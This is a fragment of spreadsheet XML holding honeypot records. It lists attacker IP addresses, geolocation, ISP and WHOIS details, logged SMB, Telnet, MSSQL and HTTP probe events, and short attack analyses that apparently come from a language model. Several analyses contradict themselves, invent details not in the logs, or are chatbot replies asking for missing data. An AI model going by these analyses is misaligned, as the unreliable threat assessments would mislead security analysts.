    <t>5900&amp;&amp;61483&amp;&amp;55965&amp;&amp;58904&amp;&amp;59102&amp;&amp;49646</t>
  </si>
  <si>
    <t>State of Berlin</t>
  </si>
  <si>
    <t>Kreisfreie Stadt Berlin</t>
  </si>
  <si>
    <t>10178</t>
  </si>
  <si>
    <t>52.52</t>
  </si>
  <si>
    <t>13.405</t>
  </si>
  <si>
    <t>8560</t>
  </si>
  <si>
    <t>IONOS SE</t>
  </si>
  <si>
    <t>De Ber Ionos Cloud Txl</t>
  </si>
  <si>
    <t>2001-02-19</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d99a:5176</t>
  </si>
  <si>
    <t>No VNC activity detected, likely indicating that an attacker did not attempt to access or exploit this service, possibly because it was not being used by the honeypot's target audience. 
This lack of activity might imply that other services are being targeted instead.
It could also mean that the system is not visible or accessible for some reason. &amp;&amp; Possible attempted VNC connection from an unknown source with no credentials provided. 
No authentication occurred which could be indicative of brute-force scanning or unauthorized access attempts. 
This may be an automated probe to identify potential vulnerabilities.</t>
  </si>
  <si>
    <t>VNC Attack &amp;&amp; Port scan</t>
  </si>
  <si>
    <t>81081fa326518da54051d7705c0f54e2</t>
  </si>
  <si>
    <t>175.106.38.209</t>
  </si>
  <si>
    <t>Afghanistan</t>
  </si>
  <si>
    <t>HER</t>
  </si>
  <si>
    <t>Herat</t>
  </si>
  <si>
    <t>Herat District</t>
  </si>
  <si>
    <t>1140026</t>
  </si>
  <si>
    <t>34.3482</t>
  </si>
  <si>
    <t>62.1997</t>
  </si>
  <si>
    <t>55424</t>
  </si>
  <si>
    <t>INSTATELECOM-AS-AP</t>
  </si>
  <si>
    <t>DSL Broadband Network Herat</t>
  </si>
  <si>
    <t>::ffff:af6a:26d1</t>
  </si>
  <si>
    <t>Unknown or failed attempt to connect to TELNET service, indicating potential probing or scanning activity for vulnerabilities in this service type. No malicious action was detected, as the connection attempt failed. This suggests that the system was not compromised but may have been targeted by an attacker. &amp;&amp; The data indicates a potential malicious activity where an attempt was made to establish a TELNET connection but no data was received, suggesting a failed or blocked attack. This may be a reconnaissance probe by an attacker. The lack of any transmitted data suggests the attempt was likely aborted quickly.</t>
  </si>
  <si>
    <t>BruteForce Attempt &amp;&amp; Telnet Scanning</t>
  </si>
  <si>
    <t>481c9dad6f49430f0c4e14e40d13f485</t>
  </si>
  <si>
    <t>185.237.84.81</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Isfahan</t>
  </si>
  <si>
    <t>418863</t>
  </si>
  <si>
    <t>32.6539</t>
  </si>
  <si>
    <t>51.666</t>
  </si>
  <si>
    <t>204834</t>
  </si>
  <si>
    <t>Shabakieh Isfahan Co PJSC</t>
  </si>
  <si>
    <t>Shabakiehesfahan</t>
  </si>
  <si>
    <t>2017-12-18</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,53058)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,53697)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,63064)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,64035)}&amp;&amp;{Data_SMB:Incoming connection (185.237.84.81,61367)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:b9ed:5451</t>
  </si>
  <si>
    <t>Unauthorized user has been granted basic authentication access to local resources, potentially using SMB service. This indicates potential unauthorized access to sensitive files or systems. User attempted to authenticate locally as administrator. &amp;&amp; A user has authenticated to the system using basic authentication, which could be an attempt to gain unauthorized access or brute force login attempts. The use of basic authentication may indicate a lack of proper security measures or weak password policies. This could be a sign of malicious activity such as phishing or account compromise. &amp;&amp; This suggests an attempt to exploit MySQL database vulnerabilities, potentially for unauthorized access or data theft. The attacker may be probing weaknesses or attempting to gain a foothold in the system. This could be a reconnaissance phase before more malicious activities are carried out.</t>
  </si>
  <si>
    <t>SMB Login &amp;&amp; SMB Login</t>
  </si>
  <si>
    <t>d1787b58d0c1da16d2d03f4da7a09ec2</t>
  </si>
  <si>
    <t>198.54.134.154</t>
  </si>
  <si>
    <t>static-198-54-134-154.cust.tzulo.com</t>
  </si>
  <si>
    <t>Idaho</t>
  </si>
  <si>
    <t>Ada</t>
  </si>
  <si>
    <t>Meridian</t>
  </si>
  <si>
    <t>5600685</t>
  </si>
  <si>
    <t>83680</t>
  </si>
  <si>
    <t>43.6121</t>
  </si>
  <si>
    <t>-116.392</t>
  </si>
  <si>
    <t>tzulo, inc.</t>
  </si>
  <si>
    <t>Tzulo-Sjc</t>
  </si>
  <si>
    <t>2000-04-19 04:30:40</t>
  </si>
  <si>
    <t>2026-04-19 04:30:40</t>
  </si>
  <si>
    <t>2025-03-21 06:21:29</t>
  </si>
  <si>
    <t>['NS1.TZULO.COM', 'NS2.TZULO.COM']</t>
  </si>
  <si>
    <t>ENOM, INC.</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']</t>
  </si>
  <si>
    <t>Whois Agent (081135083)</t>
  </si>
  <si>
    <t>['domainabuse@tucows.com', 'mdqpdflf@whoisprivacyprotect.com', 'ABUSE@ENOM.COM']</t>
  </si>
  <si>
    <t>['PO Box 639', 'C/O tzulo.com']</t>
  </si>
  <si>
    <t>::ffff:c636:869a</t>
  </si>
  <si>
    <t>No MySQL related activity detected, possibly an attempt to connect or probe for vulnerability but was unsuccessful or blocked. No malicious action taken, but potential threat noted. System is still secure at this time. &amp;&amp; No malicious activity detected as the service is not responding (MySQL server appears to be down). 
This could indicate a denial of service attack or a database outage. 
The lack of response suggests that an attacker may be trying to flood the system with requests.</t>
  </si>
  <si>
    <t>2211e5ab4fcf4b57e63fb714834486e8</t>
  </si>
  <si>
    <t>122.166.145.46</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23048&amp;&amp;23</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:7aa6:912e</t>
  </si>
  <si>
    <t>6246ccdc8d3b3a99c5e0ac9c0b5ff5d2</t>
  </si>
  <si>
    <t>59.93.1.127</t>
  </si>
  <si>
    <t>::ffff:3b5d:17f</t>
  </si>
  <si>
    <t>4eab88e4706a8af51fa8151a76180af1</t>
  </si>
  <si>
    <t>27.123.249.132</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>Saharanpur</t>
  </si>
  <si>
    <t>Chhutmalpur</t>
  </si>
  <si>
    <t>1441210</t>
  </si>
  <si>
    <t>30.0321</t>
  </si>
  <si>
    <t>77.7533</t>
  </si>
  <si>
    <t>133278</t>
  </si>
  <si>
    <t>Dehradun Enet Solutions Private Ltd</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.123.249.132,62950)}&amp;&amp;{Data_SMB:Incoming connection (27.123.249.132,64239)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:1b7b:f984</t>
  </si>
  <si>
    <t>980fb059318121dbfeb2ad25705c0dd8</t>
  </si>
  <si>
    <t>114.143.135.162</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>22599&amp;&amp;123&amp;&amp;57480&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>Navi Mumbai (MIDC Industrial Area)</t>
  </si>
  <si>
    <t>19.0652</t>
  </si>
  <si>
    <t>73.0289</t>
  </si>
  <si>
    <t>17762</t>
  </si>
  <si>
    <t>Tata Teleservices (Maharashtra) Ltd</t>
  </si>
  <si>
    <t>TTML</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50037)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50586)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50617)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,51138)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,64456)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,64490)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,49340)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,63749)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,63806)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,65126)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,49885)}&amp;&amp;{Data_SMB:Incoming connection (114.143.135.162,50655)}</t>
  </si>
  <si>
    <t>::ffff:728f:87a2</t>
  </si>
  <si>
    <t>A suspicious incoming SMB connection from an unknown IP address (114.143.135.162) at port 49885 indicating potential malware or brute-force attack attempts on shared resources. The IP origin is likely malicious due to the unusual port number and lack of authentication. Further investigation is required for security measures. &amp;&amp; An incoming connection was detected from an IP address, indicating potential unauthorized access to the SMB service. This could be an attempt to exploit vulnerabilities or gain unauthorized access. The source IP is likely spoofed, making it difficult to track its origin. &amp;&amp; This suggests an attempt to access or exploit Microsoft SQL Server database, potentially for unauthorized data extraction or malicious activities. The fact that it's being queried is unusual and may indicate a vulnerability being targeted. An attacker might be trying to gather sensitive information from the database.</t>
  </si>
  <si>
    <t>b2f5a9a3ea574ec8643b1968fb53c6b6</t>
  </si>
  <si>
    <t>69.137.31.194</t>
  </si>
  <si>
    <t>c-69-137-31-194.hsd1.al.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>AL</t>
  </si>
  <si>
    <t>Alabama</t>
  </si>
  <si>
    <t>Madison</t>
  </si>
  <si>
    <t>Huntsville</t>
  </si>
  <si>
    <t>4068590</t>
  </si>
  <si>
    <t>35893</t>
  </si>
  <si>
    <t>34.7304</t>
  </si>
  <si>
    <t>-86.5861</t>
  </si>
  <si>
    <t>::ffff:4589:1fc2</t>
  </si>
  <si>
    <t>No log data provided. &amp;&amp; No activity data provided, unable to analyze.</t>
  </si>
  <si>
    <t>I'd love to help, but it seems like you haven't provided any log data. Can you please provide the log data so I can analyze and name the type of attack?</t>
  </si>
  <si>
    <t>81227bdd72983d9987246095bb7cf86c</t>
  </si>
  <si>
    <t>117.254.30.73</t>
  </si>
  <si>
    <t>::ffff:75fe:1e49</t>
  </si>
  <si>
    <t>No TELNET traffic was detected, but this is unusual since TELNET access is typically restricted. This could indicate an attempt to bypass security measures or exploit a vulnerability. It might also suggest a lack of malicious activity in this area. &amp;&amp; No TELNET activity detected, indicating no malicious login attempts via this service so far.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Telnet Attack</t>
  </si>
  <si>
    <t>a004cd1bf63738fd3132f4665e3f9fe5</t>
  </si>
  <si>
    <t>122.187.39.178</t>
  </si>
  <si>
    <t>SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>143&amp;&amp;27064&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;50095</t>
  </si>
  <si>
    <t>2008-07-07</t>
  </si>
  <si>
    <t>BNLD-209392-NewDelhi</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,56755)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,56747)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,57029)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,59582)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,59825)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,62026)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,62370)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.187.39.178,57719)}</t>
  </si>
  <si>
    <t>::ffff:7abb:27b2</t>
  </si>
  <si>
    <t>This indicates an attempt to exploit Microsoft SQL Server, possibly through a brute-force attack or vulnerability scanning. The attacker may be trying to gain unauthorized access to sensitive data or execute malicious queries. This could be an early stage of a larger cyber attack.</t>
  </si>
  <si>
    <t>698e437aea0c11a38879468a6954cfe6</t>
  </si>
  <si>
    <t>117.192.118.197</t>
  </si>
  <si>
    <t>::ffff:75c0:76c5</t>
  </si>
  <si>
    <t>7e653f5f569022fc72ce9836d04b5aa2</t>
  </si>
  <si>
    <t>134.238.139.111</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Brute Force</t>
  </si>
  <si>
    <t>SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1</t>
  </si>
  <si>
    <t>443</t>
  </si>
  <si>
    <t>394089</t>
  </si>
  <si>
    <t>Palo Alto Networks</t>
  </si>
  <si>
    <t>2021-02-03</t>
  </si>
  <si>
    <t>2021-02-08</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:86ee:8b6f</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>c18d0246fabbf4ec7ab769e64b8d8f91</t>
  </si>
  <si>
    <t>85.185.64.219</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H2</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;39533&amp;&amp;33415&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>Tehran (District 6)</t>
  </si>
  <si>
    <t>35.7373</t>
  </si>
  <si>
    <t>51.4157</t>
  </si>
  <si>
    <t>Information Technology Company</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,53270)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,53331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,58188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,57090)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,57147)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,50048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,49975)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,64261)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,64337)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,62174)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,62261)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:55b9:40db</t>
  </si>
  <si>
    <t>Data indicates a potential attempt to exploit a vulnerability in Microsoft SQL Server by accessing its management interface without authentication or authorization, which could allow an attacker to gain unauthorized access and extract sensitive information. This suggests a malicious actor is probing for weaknesses to inject malicious code or steal data. The absence of credentials (NA) implies the attacker may be attempting a brute-force login or exploiting a default setting vulnerability.</t>
  </si>
  <si>
    <t>42391b3e185bffff74170dc5b71759d6</t>
  </si>
  <si>
    <t>122.172.123.90</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7</t>
  </si>
  <si>
    <t>::ffff:7aac:7b5a</t>
  </si>
  <si>
    <t>This log indicates possible exploitation of a vulnerability, where an attacker is attempting to identify potential targets for further attack. The malicious activity involves scanning or probing the system to discover open ports or services. This could be a reconnaissance step before launching a more targeted attack.</t>
  </si>
  <si>
    <t>I'd be happy to help analyze the log data!
However, I don't see any log data provided. Could you please provide the log data so I can assist you in identifying the type of attack? 
Once you provide the log data, I'll do my best to:
    Name the type of attack in a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>ff4ebfa26ac5f8f9429cc9671be5bdc9</t>
  </si>
  <si>
    <t>83.10.53.169</t>
  </si>
  <si>
    <t>Warsaw (Śródmieście)</t>
  </si>
  <si>
    <t>52.2274</t>
  </si>
  <si>
    <t>21.009</t>
  </si>
  <si>
    <t>5617</t>
  </si>
  <si>
    <t>TPNET</t>
  </si>
  <si>
    <t>Orange Polska Spolka Akcyjna</t>
  </si>
  <si>
    <t>Orange Polska S.A.</t>
  </si>
  <si>
    <t>::ffff:530a:35a9</t>
  </si>
  <si>
    <t>No activity detected for TELNET service.
TELNET is a remote access protocol that allows users to access and manage devices over a network.
This lack of activity could indicate a benign or unknown situation, rather than malicious intent. &amp;&amp; The data indicates that there was an attempt to connect using Telnet, which is often used for malicious activities as it allows unauthorized access to systems.
This connection could be an attempt to gain remote access or execute commands on the system without permission.
The lack of a response (indicated by "NA") suggests the attempted connection may have been unsuccessful.</t>
  </si>
  <si>
    <t>Telnet scan &amp;&amp; Telnet Attack</t>
  </si>
  <si>
    <t>8867e010427b1b421d63144dc02027d0</t>
  </si>
  <si>
    <t>187.19.203.197</t>
  </si>
  <si>
    <t>{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>Pernambuco</t>
  </si>
  <si>
    <t>Trindade</t>
  </si>
  <si>
    <t>3386042</t>
  </si>
  <si>
    <t>-7.76194</t>
  </si>
  <si>
    <t>-40.2678</t>
  </si>
  <si>
    <t>28126</t>
  </si>
  <si>
    <t>BRISANET SERVICOS DE TELECOMUNICACOES LTDA</t>
  </si>
  <si>
    <t>Brisanet Servicos De Telecomunicacoes S.A</t>
  </si>
  <si>
    <t>Francisco Diego Araujo Vieira</t>
  </si>
  <si>
    <t>::ffff:bb13:cbc5</t>
  </si>
  <si>
    <t>c0c021db7bb87cfeb8db517cff870a5c</t>
  </si>
  <si>
    <t>77.239.24.15</t>
  </si>
  <si>
    <t>Bosnia and Herzegovina</t>
  </si>
  <si>
    <t>BIH</t>
  </si>
  <si>
    <t>Federation of B&amp;H</t>
  </si>
  <si>
    <t>Sarajevo Canton</t>
  </si>
  <si>
    <t>Sarajevo</t>
  </si>
  <si>
    <t>3191281</t>
  </si>
  <si>
    <t>43.8395</t>
  </si>
  <si>
    <t>18.3197</t>
  </si>
  <si>
    <t>42560</t>
  </si>
  <si>
    <t>Telemach BH d.o.o. Sarajevo</t>
  </si>
  <si>
    <t>TELEMACH BH</t>
  </si>
  <si>
    <t>2007-02-22</t>
  </si>
  <si>
    <t>::ffff:4def:180f</t>
  </si>
  <si>
    <t>a300e81b6f48dbf41561739275e225c7</t>
  </si>
  <si>
    <t>175.199.108.228</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39670&amp;&amp;110&amp;&amp;20302&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:afc7:6ce4</t>
  </si>
  <si>
    <t>fd30ad1aa0a8f395f749970e7320e05e</t>
  </si>
  <si>
    <t>148.113.0.104</t>
  </si>
  <si>
    <t>ns5023791.ip-148-113-0.net</t>
  </si>
  <si>
    <t>Raigad</t>
  </si>
  <si>
    <t>Navi Mumbai (Panvel)</t>
  </si>
  <si>
    <t>18.9118</t>
  </si>
  <si>
    <t>73.1947</t>
  </si>
  <si>
    <t>Ovh Sas</t>
  </si>
  <si>
    <t>Ovhtech R&amp;D (India) Private Limited</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:9471:68</t>
  </si>
  <si>
    <t>An unknown device on Android 10 is attempting to log in to the HTTP service using a suspicious browser string that may be spoofed or fake. The user agent suggests a Chrome browser but with an unusually high version number. This could indicate malicious login attempts from a scripted source. &amp;&amp; An unknown device is attempting to access an HTTP login interface, possibly using a stolen or spoofed user agent to disguise its true nature. The device is running Android 10 on a kernel version not specified but likely outdated. The browser type and version suggest it may be a common mobile browsing setup.</t>
  </si>
  <si>
    <t>Brute Login &amp;&amp; Password Stealing</t>
  </si>
  <si>
    <t>853ff6de5a617608bf142b1819f02125</t>
  </si>
  <si>
    <t>14.168.198.231</t>
  </si>
  <si>
    <t>Ho Chi Minh City</t>
  </si>
  <si>
    <t>1566083</t>
  </si>
  <si>
    <t>10.8231</t>
  </si>
  <si>
    <t>106.63</t>
  </si>
  <si>
    <t>VNPT-VNNIC</t>
  </si>
  <si>
    <t>::ffff:ea8:c6e7</t>
  </si>
  <si>
    <t>The data indicates an attempted VNC connection, suggesting a potential malware or unauthorized access attempt to a remote desktop. The absence of any further information implies the attempt was unsuccessful or no action was taken. This could be a reconnaissance probe from an attacker. &amp;&amp; No VNC login attempt detected, suggesting no malicious activity related to remote access via this service. 
However, it's worth noting that lack of VNC activity does not necessarily indicate security. &amp;&amp; No VNC (Virtual Network Computing) activity was detected, but this lack of data could be due to legitimate non-use of the service or an issue with logging. 
Typically, logs for VNC services would show successful connections or attempts even if no actual traffic occurred, so this absence is unusual.</t>
  </si>
  <si>
    <t>ec1ece29206430a5b1ce5fffdbeea8ee</t>
  </si>
  <si>
    <t>157.15.158.250</t>
  </si>
  <si>
    <t>Bengaluru (Vasanth Nagar)</t>
  </si>
  <si>
    <t>12.9834</t>
  </si>
  <si>
    <t>77.5956</t>
  </si>
  <si>
    <t>55824</t>
  </si>
  <si>
    <t>National Knowledge Network</t>
  </si>
  <si>
    <t>EDCSCEG</t>
  </si>
  <si>
    <t>Edcsceg</t>
  </si>
  <si>
    <t>2024-02-07</t>
  </si>
  <si>
    <t>::ffff:9d0f:9efa</t>
  </si>
  <si>
    <t>c5c2b13d95da9843a3ba98a86f67dd23</t>
  </si>
  <si>
    <t>45.113.189.4</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;445&amp;&amp;64028&amp;&amp;NA</t>
  </si>
  <si>
    <t>TS</t>
  </si>
  <si>
    <t>Telangana</t>
  </si>
  <si>
    <t>Hyderabad</t>
  </si>
  <si>
    <t>Hyderabad (Saifābād)</t>
  </si>
  <si>
    <t>1269843</t>
  </si>
  <si>
    <t>500001</t>
  </si>
  <si>
    <t>17.4063</t>
  </si>
  <si>
    <t>78.4675</t>
  </si>
  <si>
    <t>18229</t>
  </si>
  <si>
    <t>CtrlS</t>
  </si>
  <si>
    <t>Pioneer Integrated - NOC</t>
  </si>
  <si>
    <t>Pioneer Integrated Network Solutions Private Limited</t>
  </si>
  <si>
    <t>::ffff:2d71:bd04</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. 
(This is a default response since there's no actual log data given for analysis.)</t>
  </si>
  <si>
    <t>71029e31c65e59b5db83865f01d149e1</t>
  </si>
  <si>
    <t>176.65.149.67</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:b041:9543</t>
  </si>
  <si>
    <t>No data provided, therefore there is no activity to analyze. &amp;&amp; No malicious activity detected based on provided log data. &amp;&amp; No log data provided, therefore unable to analyze or describe any possible malicious activity. &amp;&amp; The log indicates that no TELNET activity was detected during this monitoring period which is unusual as many malicious scans often check for open TELNET ports. This could be a sign of normal network traffic or possibly an evasion tactic where the attacker didn't probe for TELNET access. The lack of detection might not necessarily mean there's no threat but it could suggest that the attack vector was not exploited this time around. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data is provided, so there's nothing to analyze or describe.</t>
  </si>
  <si>
